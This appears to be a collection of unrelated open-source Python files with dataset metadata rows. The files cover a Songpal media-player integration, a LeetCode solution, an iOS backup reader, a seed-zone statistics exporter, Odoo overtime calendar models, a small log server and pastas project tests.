SUPPORT_SONGPAL = SUPPORT_VOLUME_SET | SUPPORT_VOLUME_STEP | \
SUPPORT_VOLUME_MUTE | SUPPORT_SELECT_SOURCE | \
SUPPORT_TURN_ON | SUPPORT_TURN_OFF
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME): cv.string,
vol.Required(CONF_ENDPOINT): cv.string,
})
SET_SOUND_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_id,
vol.Required(PARAM_NAME): cv.string,
vol.Required(PARAM_VALUE): cv.string,
})
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Set up the Songpal platform."""
from songpal import SongpalException
if PLATFORM not in hass.data:
hass.data[PLATFORM] = {}
if discovery_info is not None:
name = discovery_info["name"]
endpoint = discovery_info["properties"]["endpoint"]
_LOGGER.debug("Got autodiscovered %s - endpoint: %s", name, endpoint)
device = SongpalDevice(name, endpoint)
else:
name = config.get(CONF_NAME)
endpoint = config.get(CONF_ENDPOINT)
device = SongpalDevice(name, endpoint)
try:
await device.initialize()
except SongpalException as ex:
_LOGGER.error("Unable to get methods from songpal: %s", ex)
raise PlatformNotReady
hass.data[PLATFORM][endpoint] = device
async_add_entities([device], True)
async def async_service_handler(service):
"""Service handler."""
entity_id = service.data.get("entity_id", None)
params = {key: value for key, value in service.data.items()
if key != ATTR_ENTITY_ID}
for device in hass.data[PLATFORM].values():
if device.entity_id == entity_id or entity_id is None:
_LOGGER.debug("Calling %s (entity: %s) with params %s",
service, entity_id, params)
await device.async_set_sound_setting(
params[PARAM_NAME], params[PARAM_VALUE])
hass.services.async_register(
DOMAIN, SET_SOUND_SETTING, async_service_handler,
schema=SET_SOUND_SCHEMA)
class SongpalDevice(MediaPlayerDevice):
"""Class representing a Songpal device."""
def __init__(self, name, endpoint):
"""Init."""
import songpal
self._name = name
self.endpoint = endpoint
self.dev = songpal.Device(self.endpoint)
self._sysinfo = None
self._state = False
self._available = False
self._initialized = False
self._volume_control = None
self._volume_min = 0
self._volume_max = 1
self._volume = 0
self._is_muted = False
self._sources = []
async def initialize(self):
"""Initialize the device."""
await self.dev.get_supported_methods()
self._sysinfo = await self.dev.get_system_info()
@property
def name(self):
"""Return name of the device."""
return self._name
@property
def unique_id(self):
"""Return a unique ID."""
return self._sysinfo.macAddr
@property
def available(self):
"""Return availability of the device."""
return self._available
async def async_set_sound_setting(self, name, value):
"""Change a setting on the device."""
await self.dev.set_sound_settings(name, value)
async def async_update(self):
"""Fetch updates from the device."""
from songpal import SongpalException
try:
volumes = await self.dev.get_volume_information()
if not volumes:
_LOGGER.error("Got no volume controls, bailing out")
self._available = False
return
if len(volumes) > 1:
_LOGGER.debug(
"Got %s volume controls, using the first one", volumes)
volume = volumes[0]
_LOGGER.debug("Current volume: %s", volume)
self._volume_max = volume.maxVolume
self._volume_min = volume.minVolume
self._volume = volume.volume
self._volume_control = volume
self._is_muted = self._volume_control.is_muted
status = await self.dev.get_power()
self._state = status.status
_LOGGER.debug("Got state: %s", status)
inputs = await self.dev.get_inputs()
_LOGGER.debug("Got ins: %s", inputs)
self._sources = inputs
self._available = True
except SongpalException as ex:
# if we were available, print out the exception
if self._available:
_LOGGER.error("Got an exception: %s", ex)
self._available = False
async def async_select_source(self, source):
"""Select source."""
for out in self._sources:
if out.title == source:
await out.activate()
return
_LOGGER.error("Unable to find output: %s", source)
@property
def source_list(self):
"""Return list of available sources."""
return [x.title for x in self._sources]
@property
def state(self):
"""Return current state."""
if self._state:
return STATE_ON
return STATE_OFF
@property
def source(self):
"""Return currently active source."""
for out in self._sources:
if out.active:
return out.title
return None
@property
def volume_level(self):
"""Return volume level."""
volume = self._volume / self._volume_max
return volume
async def async_set_volume_level(self, volume):
"""Set volume level."""
volume = int(volume * self._volume_max)
_LOGGER.debug("Setting volume to %s", volume)
return await self._volume_control.set_volume(volume)
async def async_volume_up(self):
"""Set volume up."""
return await self._volume_control.set_volume("+1")
async def async_volume_down(self):
"""Set volume down."""
return await self._volume_control.set_volume("-1")
async def async_turn_on(self):
"""Turn the device on."""
return await self.dev.set_power(True)
async def async_turn_off(self):
"""Turn the device off."""
return await self.dev.set_power(False)
async def async_mute_volume(self, mute):
"""Mute or unmute the device."""
_LOGGER.debug("Set mute: %s", mute)
return await self._volume_control.set_mute(mute)
@property
def is_volume_muted(self):
"""Return whether the device is muted."""
return self._is_muted
@property
def supported_features(self):
"""Return supported features."""
return SUPPORT_SONGPAL
| mit | 4,327,482,265,439,586,000 | 29.515873 | 78 | 0.602731 | false | 4.088251 | false | false | false |
yiwen-luo/LeetCode | Python/next-closest-time.py | 3 | 1267 | # Time: O(1)
# Space: O(1)
# Given a time represented in the format "HH:MM",
# form the next closest time by reusing the current digits.
# There is no limit on how many times a digit can be reused.
#
# You may assume the given input string is always valid.
# For example, "01:34", "12:09" are all valid. "1:34", "12:9" are all invalid.
#
# Example 1:
#
# Input: "19:34"
# Output: "19:39"
# Explanation: The next closest time choosing from digits 1, 9, 3, 4, is 19:39, which occurs 5 minutes later.
# It is not 19:33, because this occurs 23 hours and 59 minutes later.
#
# Example 2:
#
# Input: "23:59"
# Output: "22:22"
# Explanation: The next closest time choosing from digits 2, 3, 5, 9, is 22:22.
# It may be assumed that the returned time is next day's time since it is smaller than the input time numerically.
class Solution(object):
def nextClosestTime(self, time):
"""
:type time: str
:rtype: str
"""
h, m = time.split(":")
curr = int(h) * 60 + int(m)
result = None
for i in xrange(curr+1, curr+1441):
t = i % 1440
h, m = t // 60, t % 60
result = "%02d:%02d" % (h, m)
if set(result) <= set(time):
break
return result
| mit | -679,157,756,229,711,200 | 30.675 | 114 | 0.595107 | false | 3.223919 | false | false | false |
fmartingr/iosfu | iosfu/backup.py | 1 | 5063 | from __future__ import with_statement
from os import listdir
from os.path import join as join_paths, basename, isdir, isfile
from plistlib import readPlist
from biplist import readPlist as readBinaryPlist
from .conf import BACKUPS_PATH, BACKUP_DEFAULT_SETTINGS
from iosfu import utils
class BackupManager(object):
# Path to backups
path = None
# Backups loaded
backups = {}
def __init__(self, path=BACKUPS_PATH):
self.path = path
def lookup(self):
"""
Look for backup folders on PATH
"""
folders = listdir(self.path)
for dirname in folders:
path = join_paths(self.path, dirname)
if isdir(path):
backup = Backup(path)
self.backups[backup.id] = backup
def get(self, backup_id):
if backup_id in self.backups and self.backups[backup_id].valid:
return self.backups[backup_id]
else:
raise Exception('Backup not registered')
class Backup(object):
"""
Backup object
"""
# Backup id
id = None
# Backup path
path = None
# Files
files = []
# bool if its valid -> self.init_check()
valid = True
# Required files to mark as valid
_required_files = [
'Info.plist', 'Manifest.mbdb', 'Manifest.plist', 'Status.plist'
]
# File handlers to call methods
_file_handlers = {
'.plist': '_read_plist'
}
_plist = {}
# Data
_data_file = None
_data = {}
def __init__(self, path):
self.path = path
self.get_info()
self._data_file = self.get_data_file()
self.init_check()
self.read_data_file()
@property
def name(self):
name = self.data('name') or self.id
return name
def get_data_file(self):
return "{}.iosfu".format(self.path)
def read_data_file(self):
try:
handler = open(self._data_file)
except (OSError, IOError):
# Create default config file if non-existant
handler = open(self._data_file, 'w+')
handler.write(utils.serialize(BACKUP_DEFAULT_SETTINGS))
handler.seek(0)
finally:
with handler as f:
data_file = f.read()
self._data = utils.deserialize(data_file)
handler.close()
def get_info(self):
"""
Get all the basic info for the backup
"""
self.id = basename(self.path)
# Check all files
for filename in listdir(self.path):
if isfile(join_paths(self.path, filename)):
self.files.append(filename)
# Check handlers
for match in self._file_handlers.keys():
if match in filename:
handler = getattr(self, self._file_handlers[match])
handler(filename)
def init_check(self):
"""
Check if the needed stuff are there to consider this a backup
"""
for required_file in self._required_files:
# Check if required files are there
# FIXME Sometimes it doesn't work :?
if required_file not in self.files:
self.valid = False
def exists(self, filename):
"""
Check if the given file exists
"""
return filename in self.files
def get_file(self, filename, handler=False):
"""
Returns given file path
- handler (bool) - Returns handler instead of path
"""
result = None
if self.exists(filename):
file_path = join_paths(self.path, filename)
if handler:
result = open(file_path, 'rb')
else:
result = file_path
return result
#
# File handlers
#
def _read_plist(self, filename):
"""
Handler for .plist files
Reads them and stores on self._plist for plugin access
"""
file_path = self.get_file(filename)
try:
self._plist[filename] = readPlist(file_path)
except:
# Is binaryPlist?
try:
self._plist[filename] = readBinaryPlist(file_path)
except:
# What is it?
pass
#
# Backup data file
#
def data(self, key, value=None):
result = value
if value:
self._data[key] = value
elif key in self._data:
result = self._data[key]
return result
def cache(self, key, value=None):
result = value
if value:
self._data['cache'][key] = value
elif key in self._data['cache']:
result = self._data['cache'][key]
return result
def clear_cache(self):
self._data['cache'] = {}
self.write_data_file()
def write_data_file(self):
handler = open(self._data_file, 'w+')
handler.write(utils.serialize(self._data))
handler.close()
| mit | 8,790,374,785,862,651,000 | 24.700508 | 75 | 0.537428 | false | 4.22621 | false | false | false |
consbio/seedsource-core | seedsource_core/django/seedsource/management/commands/export_seedzone_stats.py | 1 | 11651 | import errno
import json
import math
import os
import time
from collections import defaultdict
from csv import DictWriter
import warnings
import numpy
from progress.bar import Bar
from django.conf import settings
from django.core.management import BaseCommand, CommandError
from django.contrib.gis.db.models.functions import Area
from rasterio.features import rasterize
from seedsource_core.django.seedsource.models import SeedZone, Region, ZoneSource
from ..constants import PERIODS, VARIABLES
from ..utils import get_regions_for_zone, calculate_pixel_area, generate_missing_bands
from ..dataset import (
ElevationDataset,
ClimateDatasets,
)
from ..statswriter import StatsWriters
from ..zoneconfig import ZoneConfig
class Command(BaseCommand):
help = "Export seed zone statistics and sample data"
def add_arguments(self, parser):
parser.add_argument("output_directory", nargs=1, type=str)
parser.add_argument(
"--zones",
dest="zoneset",
default=None,
help="Comma delimited list of zones sets to analyze. (default is to analyze all available zone sets)",
)
parser.add_argument(
"--variables",
dest="variables",
default=None,
help="Comma delimited list of variables analyze. (default is to analyze all available variables: {})".format(
",".join(VARIABLES)
),
)
parser.add_argument(
"--periods",
dest="periods",
default=None,
help="Comma delimited list of time periods analyze. (default is to analyze all available time periods: {})".format(
",".join(PERIODS)
),
)
parser.add_argument(
"--seed",
dest="seed",
default=None,
help="Seed for random number generator, to reproduce previous random samples",
type=int,
)
def _write_sample(self, output_directory, variable, id, zone_id, data, low, high):
sample = data.copy()
numpy.random.shuffle(sample)
sample = sample[:1000]
filename = "{}_{}_{}.txt".format(id, low, high)
with open(os.path.join(output_directory, "{}_samples".format(variable), filename), "w") as f:
f.write(",".join(str(x) for x in sample))
f.write(os.linesep)
def handle(self, output_directory, zoneset, variables, periods, seed, *args, **kwargs):
output_directory = output_directory[0]
if zoneset is None or zoneset.strip() == "":
sources = ZoneSource.objects.all().order_by("name")
if len(sources) == 0:
raise CommandError("No zonesets available to analyze")
else:
sources = ZoneSource.objects.filter(name__in=zoneset.split(",")).order_by("name")
if len(sources) == 0:
raise CommandError("No zonesets available to analyze that match --zones values")
if variables is None:
variables = VARIABLES
else:
variables = set(variables.split(","))
missing = variables.difference(VARIABLES)
if missing:
raise CommandError("These variables are not available: {}".format(",".join(missing)))
if periods is None:
periods = PERIODS
else:
periods = set(periods.split(","))
missing = periods.difference(PERIODS)
if missing:
raise CommandError("These periods are not available: {}".format(",".join(missing)))
### Initialize random seed
if seed is None:
seed = int(time.time())
print("Using random seed: {}".format(seed))
numpy.random.seed(seed)
### Create output directories
if not os.path.exists(output_directory):
os.makedirs(output_directory)
for period in periods:
print("----------------------\nProcessing period {}\n".format(period))
period_dir = os.path.join(output_directory, period)
for variable in variables:
sample_dir = os.path.join(period_dir, "{}_samples".format(variable))
if not os.path.exists(sample_dir):
os.makedirs(sample_dir)
with StatsWriters(period_dir, variables) as writer:
for source in sources:
zones = source.seedzone_set.annotate(area_meters=Area("polygon")).all().order_by("zone_id")
with ZoneConfig(source.name) as config, ElevationDataset() as elevation_ds, ClimateDatasets(
period=period, variables=variables
) as climate:
for zone in Bar(
"Processing {} zones".format(source.name), max=source.seedzone_set.count(),
).iter(zones):
# calculate area of zone polygon in acres
poly_acres = round(zone.area_meters.sq_m * 0.000247105, 1)
zone_xmin, zone_ymin, zone_xmax, zone_ymax = zone.polygon.extent
zone_ctr_x = round(((zone_xmax - zone_xmin) / 2) + zone_xmin, 5)
zone_ctr_y = round(((zone_ymax - zone_ymin) / 2) + zone_ymin, 5)
region = get_regions_for_zone(zone)
elevation_ds.load_region(region.name)
climate.load_region(region.name)
window, coords = elevation_ds.get_read_window(zone.polygon.extent)
transform = coords.affine
elevation = elevation_ds.data[window]
# calculate pixel area based on UTM centered on window
pixel_area = round(
calculate_pixel_area(transform, elevation.shape[1], elevation.shape[0]) * 0.000247105,
1,
)
zone_mask = rasterize(
(json.loads(zone.polygon.geojson),),
out_shape=elevation.shape,
transform=transform,
fill=1, # mask is True OUTSIDE the zone
default_value=0,
dtype=numpy.dtype("uint8"),
).astype("bool")
# count rasterized pixels
raster_pixels = (zone_mask == 0).sum()
nodata_mask = elevation == elevation_ds.nodata_value
mask = nodata_mask | zone_mask
# extract all data not masked out as nodata or outside zone
# convert to feet
elevation = (elevation[~mask] / 0.3048).round().astype("int")
# if there are no pixels in the mask, skip this zone
if elevation.size == 0:
continue
min_elevation = math.floor(numpy.nanmin(elevation))
max_elevation = math.ceil(numpy.nanmax(elevation))
bands = list(config.get_elevation_bands(zone, min_elevation, max_elevation))
bands = generate_missing_bands(bands, min_elevation, max_elevation)
if not bands:
# min / max elevation outside defined bands
raise ValueError(
"Elevation range {} - {} ft outside defined bands\n".format(
min_elevation, max_elevation
)
)
### Extract data for each variable within each band
for variable, ds in climate.items():
# extract data with same shape as elevation above
data = ds.data[window][~mask]
# count the non-masked data pixels
# variables may be masked even if elevation is valid
zone_unit_pixels = data[data != ds.nodata_value].size
for band in bands:
low, high = band[:2]
band_mask = (elevation >= low) & (elevation <= high)
if not numpy.any(band_mask):
continue
# extract actual elevation range within the mask as integer feet
band_elevation = elevation[band_mask]
band_range = [
math.floor(numpy.nanmin(band_elevation)),
math.ceil(numpy.nanmax(band_elevation)),
]
# extract data within elevation range
band_data = data[band_mask]
# then apply variable's nodata mask
band_data = band_data[band_data != ds.nodata_value]
if not band_data.size:
continue
writer.write_row(
variable,
zone.zone_uid,
band,
band_range,
band_data,
period=period,
zone_set=zone.source,
species=zone.species.upper() if zone.species != "generic" else zone.species,
zone_unit=zone.zone_id,
zone_unit_poly_acres=poly_acres,
zone_unit_raster_pixels=raster_pixels,
zone_unit_raster_acres=raster_pixels * pixel_area,
zone_unit_pixels=zone_unit_pixels,
zone_unit_acres=zone_unit_pixels * pixel_area,
zone_unit_low=min_elevation,
zone_unit_high=max_elevation,
zone_pixels=band_data.size,
zone_acres=band_data.size * pixel_area,
zone_unit_ctr_x=zone_ctr_x,
zone_unit_ctr_y=zone_ctr_y,
zone_unit_xmin=round(zone_xmin, 5),
zone_unit_ymin=round(zone_ymin, 5),
zone_unit_xmax=round(zone_xmax, 5),
zone_unit_ymax=round(zone_ymax, 5),
)
self._write_sample(
period_dir, variable, zone.zone_uid, zone.zone_id, band_data, *band_range
)
| bsd-3-clause | -5,571,044,848,462,398,000 | 43.639847 | 127 | 0.465711 | false | 5.203662 | false | false | false |
marcok/odoo_modules | hr_employee_time_clock/models/resource_calendar.py | 1 | 16701 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2016 - now Bytebrand Outsourcing AG (<http://www.bytebrand.net>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime as dtime
from datetime import datetime, timedelta
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
import pytz
class ResourceCalendar(models.Model):
_inherit = 'resource.calendar'
@api.multi
def get_working_intervals_of_day(self, start_dt=None,
end_dt=None, leaves=None,
compute_leaves=False, resource_id=None,
default_interval=None):
work_limits = []
if start_dt is None and end_dt is not None:
start_dt = end_dt.replace(hour=0, minute=0, second=0)
elif start_dt is None:
start_dt = datetime.now().replace(hour=0, minute=0, second=0)
else:
work_limits.append((start_dt.replace(
hour=0, minute=0, second=0), start_dt))
if end_dt is None:
end_dt = start_dt.replace(hour=23, minute=59, second=59)
else:
work_limits.append((end_dt, end_dt.replace(
hour=23, minute=59, second=59)))
assert start_dt.date() == end_dt.date(), \
'get_working_intervals_of_day is restricted to one day'
intervals = []
work_dt = start_dt.replace(hour=0, minute=0, second=0)
# no calendar: try to use the default_interval, then return directly
if not self.ids:
working_interval = []
if default_interval:
working_interval = (
start_dt.replace(hour=default_interval[0],
minute=0, second=0),
start_dt.replace(hour=default_interval[1],
minute=0, second=0))
# intervals = self._interval_remove_leaves(working_interval, work_limits)
date_from = start_dt.replace(hour=default_interval[0],
minute=0, second=0).replace(tzinfo=pytz.UTC)
date_to = start_dt.replace(hour=default_interval[1],
minute=0, second=0).replace(tzinfo=pytz.UTC)
intervals += self._leave_intervals(date_from, date_to)
return intervals
#working_intervals = []
for calendar_working_day in self.get_attendances_for_weekdays(
[start_dt.weekday()], start_dt,
end_dt):
str_time_from_dict = str(calendar_working_day.hour_from).split('.')
hour_from = int(str_time_from_dict[0])
if int(str_time_from_dict[1]) < 10:
minutes_from = int(60 * int(str_time_from_dict[1]) / 10)
elif int(str_time_from_dict[1]) > 100:
m = str_time_from_dict[1][:2] + '.' + str_time_from_dict[1][2:]
m = float(m)
minutes_from = round(60 * m / 100)
else:
minutes_from = int(60 * int(str_time_from_dict[1]) / 100)
str_time_to_dict = str(calendar_working_day.hour_to).split('.')
hour_to = int(str_time_to_dict[0])
if int(str_time_to_dict[1]) < 10:
minutes_to = int(60 * int(str_time_to_dict[1]) / 10)
elif int(str_time_to_dict[1]) > 100:
m = str_time_to_dict[1][:2] + '.' + str_time_to_dict[1][2:]
m = float(m)
minutes_to = round(60 * m / 100)
else:
minutes_to = int(60 * int(str_time_to_dict[1]) / 100)
working_interval = (
work_dt.replace(hour=hour_from).replace(minute=minutes_from),
work_dt.replace(hour=hour_to).replace(minute=minutes_to)
)
# working_intervals += self._interval_remove_leaves(working_interval, work_limits)
intervals.append(working_interval)
date_from = work_dt.replace(hour=hour_from).replace(minute=minutes_from).replace(tzinfo=pytz.UTC)
date_to = work_dt.replace(hour=hour_to).replace(minute=minutes_to).replace(tzinfo=pytz.UTC)
# working_intervals += self._leave_intervals(date_from, date_to)
# find leave intervals
if leaves is None and compute_leaves:
leaves = self._get_leave_intervals(resource_id=resource_id)
# filter according to leaves
# for interval in working_intervals:
# if not leaves:
# leaves = []
# work_intervals = self._interval_remove_leaves(interval, leaves)
# intervals += work_intervals
return intervals
@api.multi
def get_working_hours_of_date(self, start_dt=None,
end_dt=None, leaves=None,
compute_leaves=None, resource_id=None,
default_interval=None):
""" Get the working hours of the day based on calendar. This method uses
get_working_intervals_of_day to have the work intervals of the day. It
then calculates the number of hours contained in those intervals. """
res = dtime.timedelta()
intervals = self.get_working_intervals_of_day(
start_dt, end_dt, leaves,
compute_leaves, resource_id,
default_interval)
for interval in intervals:
res += interval[1] - interval[0]
return seconds(res) / 3600.0
@api.multi
def get_bonus_hours_of_date(self, start_dt=None,
end_dt=None, leaves=None,
compute_leaves=False, resource_id=None,
default_interval=None):
""" Get the working hours of the day based on calendar. This method uses
get_working_intervals_of_day to have the work intervals of the day. It
then calculates the number of hours contained in those intervals. """
res = dtime.timedelta()
intervals = self.get_working_intervals_of_day(
start_dt, end_dt, leaves,
compute_leaves, resource_id,
default_interval)
for interval in intervals:
res += interval[1] - interval[0]
return seconds(res) / 3600.0
@api.multi
def get_attendances_for_weekdays(self, weekdays, start_dt, end_dt):
""" Given a list of weekdays, return matching
resource.calendar.attendance"""
res = []
for att in self.attendance_ids:
if int(att.dayofweek) in weekdays:
if not att.date_from or not att.date_to:
res.append(att)
else:
date_from = datetime.strptime(att.date_from, '%Y-%m-%d')
date_to = datetime.strptime(att.date_to, '%Y-%m-%d')
if date_from <= start_dt <= date_to:
res.append(att)
return res
use_overtime = fields.Boolean(string="Use Overtime Setting")
min_overtime_count = fields.Integer(string="Minimum overtime days",
default=0,
required=True)
count = fields.Integer(string="Percent Count",
default=0,
required=True)
overtime_attendance_ids = fields.One2many(
'resource.calendar.attendance.overtime',
'overtime_calendar_id',
string='Overtime')
two_days_shift = fields.Boolean(string='Shift between two days',
default=True,
help='Use for night shift between '
'two days.')
@api.constrains('min_overtime_count')
def _check_min_overtime_count(self):
"""Ensure that field min_overtime_count is >= 0"""
if self.min_overtime_count < 0:
raise ValidationError("Minimum overtime days must be positive.")
@api.constrains('two_days_shift')
def _check_two_days_shift(self):
if self.two_days_shift is False:
for attendance_id in self.overtime_attendance_ids:
if attendance_id.hour_to <= attendance_id.hour_from:
raise ValidationError("Overtime to must be greater than "
"overtime from when two days "
"shift is not using.")
@api.multi
def _get_leave_intervals(self, resource_id=None,
start_datetime=None, end_datetime=None):
self.ensure_one()
if resource_id:
domain = ['|',
('resource_id', '=', resource_id),
('resource_id', '=', False)]
else:
domain = [('resource_id', '=', False)]
if start_datetime:
domain += [('date_to', '>', fields.Datetime.to_string(
start_datetime + timedelta(days=-1)))]
if end_datetime:
domain += [('date_from', '<',
fields.Datetime.to_string(start_datetime +
timedelta(days=1)))]
leaves = self.env['resource.calendar.leaves'].search(
domain + [('calendar_id', '=', self.id)])
filtered_leaves = self.env['resource.calendar.leaves']
for leave in leaves:
if not leave.tz:
if self.env.context.get('tz'):
leave.tz = self.env.context.get('tz')
else:
leave.tz = 'UTC'
if start_datetime:
leave_date_to = to_tz(
fields.Datetime.from_string(leave.date_to), leave.tz)
if not leave_date_to >= start_datetime:
continue
if end_datetime:
leave_date_from = to_tz(
fields.Datetime.from_string(leave.date_from), leave.tz)
if not leave_date_from <= end_datetime:
continue
filtered_leaves += leave
return [self._interval_new(
to_tz(fields.Datetime.from_string(leave.date_from), leave.tz),
to_tz(fields.Datetime.from_string(leave.date_to), leave.tz),
{'leaves': leave}) for leave in filtered_leaves]
@api.multi
def initial_overtime(self):
contracts = self.env['hr.contract'].search(
[('resource_calendar_id', '=', self.id)])
employee_ids = [contract.employee_id.id for contract in contracts]
for employee in self.env['hr.employee'].browse(set(employee_ids)):
employee.initial_overtime()
class ResourceCalendarAttendanceOvertime(models.Model):
_name = "resource.calendar.attendance.overtime"
_order = 'dayofweek, hour_from'
_description = 'ResourceCalendarAttendanceOvertime'
name = fields.Char(required=True)
dayofweek = fields.Selection([('0', 'Monday'),
('1', 'Tuesday'),
('2', 'Wednesday'),
('3', 'Thursday'),
('4', 'Friday'),
('5', 'Saturday'),
('6', 'Sunday')
],
string='Day of Week',
required=True,
index=True,
default='0')
date_from = fields.Date(string='Starting Date')
date_to = fields.Date(string='End Date')
hour_from = fields.Float(string='Overtime from',
required=True,
index=True,
help="Start and End time of Overtime.")
hour_to = fields.Float(string='Overtime to',
required=True)
overtime_calendar_id = fields.Many2one("resource.calendar",
string="Resource's Calendar",
required=True,
ondelete='cascade')
def seconds(td):
assert isinstance(td, dtime.timedelta)
return (td.microseconds + (
td.seconds + td.days * 24 * 3600) * 10 ** 6) / 10. ** 6
def to_tz(datetime, tz_name):
tz = pytz.timezone(tz_name)
return pytz.UTC.localize(datetime.replace(tzinfo=None),
is_dst=False).astimezone(tz).replace(tzinfo=None)
class ResourceCalendarAttendance(models.Model):
_inherit = "resource.calendar.attendance"
@api.multi
def write(self, values):
if 'date_from' in values.keys() or 'date_to' in values.keys():
old_date_from = self.date_from
old_date_to = self.date_to
new_date_from = values.get('date_from') or self.date_from
new_date_to = values.get('date_to') or self.date_to
start_calc = None
if not old_date_from or not new_date_from:
start_calc = (datetime.now().date().replace(
month=1, day=1)).strftime("%Y-%m-%d")
end_calc = None
if not old_date_to or not new_date_to:
end_calc = (datetime.now().date().replace(
month=12, day=31)).strftime("%Y-%m-%d")
res = super(ResourceCalendarAttendance, self).write(values)
list_of_dates = filter(None, [new_date_from, new_date_to,
old_date_from, old_date_to,
end_calc, start_calc])
list_of_dates = [datetime.strptime(date, "%Y-%m-%d") for date in
list_of_dates]
date_end = max(list_of_dates)
date_start = min(list_of_dates)
self.change_working_time(date_start, date_end)
return res
else:
return super(ResourceCalendarAttendance, self).write(values)
@api.model
def create(self, values):
date_start = values.get('date_from') or (
datetime.now().date().replace(month=1, day=1)).strftime("%Y-%m-%d")
date_end = values.get('date_to') or (
datetime.now().date().replace(month=12, day=31)).strftime(
"%Y-%m-%d")
res = super(ResourceCalendarAttendance, self).create(values)
res.change_working_time(date_start, date_end)
return res
@api.multi
def unlink(self):
date_start = self.date_from or (
datetime.now().date().replace(month=1, day=1)).strftime("%Y-%m-%d")
date_end = self.date_to or (
datetime.now().date().replace(month=12, day=31)).strftime(
"%Y-%m-%d")
resource_calendar_id = self.calendar_id.id
res = super(ResourceCalendarAttendance, self).unlink()
self.change_working_time(date_start, date_end, resource_calendar_id)
return res
@api.multi
def change_working_time(self, date_start, date_end,
resource_calendar_id=False):
_logger.info(date_start)
_logger.info(date_end)
analytic_pool = self.env['employee.attendance.analytic']
if not resource_calendar_id:
resource_calendar_id = self.calendar_id.id
contract_ids = self.env['hr.contract'].search(
[('state', '=', 'open'),
('resource_calendar_id', '=', resource_calendar_id)]).ids
lines = analytic_pool.search(
[('contract_id', 'in', contract_ids),
('attendance_date', '<=', date_end),
('attendance_date', '>=', date_start)])
_logger.info(len(lines))
for line in lines:
analytic_pool.recalculate_line(line.name)
| agpl-3.0 | -787,052,981,684,389,600 | 43.18254 | 109 | 0.528232 | false | 4.130843 | false | false | false |
mamiaokui/tracer | tools/LogServer/Server.py | 1 | 2827 | import time
import BaseHTTPServer
import re
from datetime import datetime
HOST_NAME = '10.33.43.6' # !!!REMEMBER TO CHANGE THIS!!!
PORT_NUMBER = 8080 # Maybe set this to 9000.
class Event:
time = "null"
pid = 0
delay = 5
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
#Process transactions.txt
transactions_list = []
status = 0
e = Event()
for line in open("transactions.txt"):
line = line.strip()
if (status == 0):
e.pid = re.split("(\S+)-(\d+)-(\S+)", line)[2]
status = 1
continue
if (status == 1):
e.time = datetime.strptime(line[1:26], "%Y-%m-%d %H:%M:%S.%f")
status = 2
continue
if (status == 2):
if (line[0:11] != "Transaction"):
continue
if "." in line[17:]:
e.delay = datetime.strptime(line[17:], "%H:%M:%S.%f")
else:
e.delay = datetime.strptime(line[17:], "%H:%M:%S")
transactions_list.append(e)
e = Event()
status = 0
epoch = datetime(1900, 1, 1, 0, 0, 0)
pid_list = ["Time", ]
timeline = []
timeline_list = []
sorted_transactions_list = sorted(transactions_list, key=lambda x: time.mktime(x.time.timetuple()))
for event in sorted_transactions_list:
if event.pid not in pid_list:
pid_list.append(event.pid)
for event in sorted_transactions_list:
timeline = [0]*(len(pid_list))
timeline[0] = str(event.time)
delta = event.delay - epoch
timeline[pid_list.index(event.pid)] = delta.total_seconds() * 1000.0
timeline_list.append(timeline)
for content in open("main.html"):
if (content.strip() == "HEAD"):
s.wfile.write(str(pid_list)+",")
elif (content.strip() == "BODY"):
s.wfile.write(str(timeline_list)[1:-1])
else:
s.wfile.write(content)
if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
| gpl-2.0 | 9,211,730,896,767,646,000 | 33.47561 | 107 | 0.516095 | false | 3.784471 | false | false | false |
gwtsa/gwtsa | tests/test_project.py | 1 | 2884 | from pandas import read_csv
import pastas as ps
ps.set_log_level("ERROR")
def test_create_project():
pr = ps.Project(name="test")
return pr
def test_project_add_oseries():
pr = test_create_project()
obs = read_csv("tests/data/obs.csv", index_col=0, parse_dates=True,
squeeze=True)
pr.add_oseries(obs, name="heads", metadata={"x": 0.0, "y": 0})
return pr
def test_project_add_stresses():
pr = test_project_add_oseries()
prec = read_csv("tests/data/rain.csv", index_col=0, parse_dates=True,
squeeze=True)
evap = read_csv("tests/data/evap.csv", index_col=0, parse_dates=True,
squeeze=True)
pr.add_stress(prec, name="prec", kind="prec", metadata={"x": 10, "y": 10})
pr.add_stress(evap, name="evap", kind="evap",
metadata={"x": -10, "y": -10})
return pr
def test_project_add_model():
pr = test_project_add_stresses()
pr.add_models(model_name_prefix="my_", model_name_suffix="_model")
return pr
def test_project_add_recharge():
pr = test_project_add_model()
pr.add_recharge()
return pr
def test_project_solve_models():
pr = test_project_add_recharge()
pr.solve_models()
return pr
def test_project_get_parameters():
pr = test_project_solve_models()
return pr.get_parameters(["recharge_A", "noise_alpha"])
def test_project_get_statistics():
pr = test_project_solve_models()
return pr.get_statistics(["evp", "aic"])
def test_project_del_model():
pr = test_project_add_model()
pr.del_model("my_heads_model")
return pr
def test_project_del_oseries():
pr = test_project_add_oseries()
pr.del_oseries("heads")
return pr
def test_project_del_stress():
pr = test_project_add_stresses()
pr.del_stress("prec")
return pr
def test_project_get_distances():
pr = test_project_add_stresses()
return pr.get_distances()
